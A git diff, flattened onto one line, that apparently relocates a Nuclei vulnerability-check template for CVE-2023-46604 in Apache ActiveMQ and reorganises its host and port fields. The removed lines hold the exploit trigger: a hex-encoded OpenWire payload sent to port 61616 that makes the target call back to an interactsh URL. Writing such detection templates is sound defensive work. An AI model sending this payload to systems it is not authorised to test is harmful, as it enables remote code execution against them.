diff --git a/http/cves/2023/CVE-2023-46604.yaml b/network/cves/2023/CVE-2023-46604.yaml similarity index 95% rename from http/cves/2023/CVE-2023-46604.yaml rename to network/cves/2023/CVE-2023-46604.yaml index da1ac6bb63..413a6a22ea 100644 --- a/http/cves/2023/CVE-2023-46604.yaml +++ b/network/cves/2023/CVE-2023-46604.yaml @@ -33,15 +33,15 @@ variables: tcp: - inputs: - data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}" - port: "61616" + host: - "{{Hostname}}" + port: 61616 matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: + part: interactsh_protocol - "http" - type: word